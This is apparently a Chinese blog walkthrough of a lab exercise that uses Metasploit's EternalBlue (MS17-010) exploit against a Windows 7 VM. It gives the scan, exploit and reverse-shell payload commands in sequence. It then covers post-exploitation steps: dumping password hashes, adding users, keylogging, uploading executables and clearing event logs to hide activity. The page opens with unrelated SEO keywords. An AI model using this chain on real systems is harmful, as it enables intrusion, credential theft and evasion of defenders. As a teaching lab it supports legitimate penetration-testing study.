百度网站地址提交,北滘企业网站开发,可以做课程的网站,linux和WordPress1#xff1a;Metaploit介绍
本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用#xff0c;掌握Metaploit工具的使用#xff0c;知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞#xff0c;这个漏洞导致攻击者在目标系统上可…1Metaploit介绍
本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用掌握Metaploit工具的使用知道永恒之蓝的漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器无需用户任何操作只要开机上网不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 进入metaploit命令msfconsole可以看出下面有总共有六个模块辅助模块(auxiliary)、渗透攻击模块exploits、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块nops、编码器模块(encoders)其中msf为总模块其他均为分支模块。 实验环境
攻击机192.168.202.132 Kali安装Metaploit工具
靶机192.168.202.131 windows7x64未打永恒之蓝补丁且关闭防火墙 实战漏洞利用
1.进入metaploit工具使用命令msfconsole可以看出下面有总共有六个模块不同的模块功能使用的侧重点一样在进行不同的探测之前使用不同的模块。
辅助模块(auxiliary)、渗透攻击模块exploits、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块nops、编码器模块(encoders)其中msf为总模块其他均为分支模块。Metaploit的版本号为metasploit v4.17.3-dev
msfconsole 2.在进行攻击利用之前首先确实目标是否开放445端口该漏洞Ms17-010是否存在先做好简单的信息收集更能成功利用目标主机。
nmap探测主机信息
nmap -sV 192.168.202.131 445端口开放目的主机为windows7系统推测存在ms17-010漏洞 利用msf的auxiliary模块进行漏洞验证
search ms17-010 搜索有关漏洞的模块结果看到很多有关该漏洞的不同模块可以使用auxiliary/scanner/smb/smb_ms17_010 进行验证
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.202.131
set rport 445 配置好之后使用run 探测一下查看结果存在该漏洞 3.验证存在漏洞之后就可以利用永恒之蓝漏洞使用其中的渗透攻击exploit模块对其进行渗透攻击
a.设置攻击目标、端口、本机
use exploit/windows/smb/ms17_010_eternalblue b.使用exp进行攻击时要使用payload作为子弹进行攻击
set payload windows/x64/meterpreter/reverse_tcp c.查看具体配置是否完整
show options d.进行攻击
run soga 进去了看样子差不多可以嘿嘿嘿了*-* 4.进入shell获取命令行可以看到直接获得system权限
meterpreter是metasploit框架中的一个扩展模块作为溢出成功后的攻击载荷使用攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell的链接。
a.从上面看出已经攻入成功可以输入sysinfo查看系统信息
meterpreter sysinfo b.反弹shell
meterpreter shell meterpreter shell作为渗透模块有很多有用的功能比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS基于主机的入侵检测系统) 很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。 5.shell利用
(1).新建用户、获得用户密码
a.密码为进入hash加密值可以利用在线解密进行破解
meterpreter hashdump 可以看到用户名密码hash解码就可以拿到密码了
b.进入shell新建用户 c. 捕捉屏幕screenhot 到这个路径下查看可以看到返回的图片 d.获取按键信息
开始获取keyscan_start
下载内容keyscan_dump 没有获取到应该需要在捕获的同时需要进行键盘操作 e.上传文件
“upload”命令为上传文件到靶机下例如黑客上传一个勒索病毒WannaCry测试上传了一个hack.exe文件到可以直接执行 f. 清除事件日志
执行“clearev”命令将清除事件日志。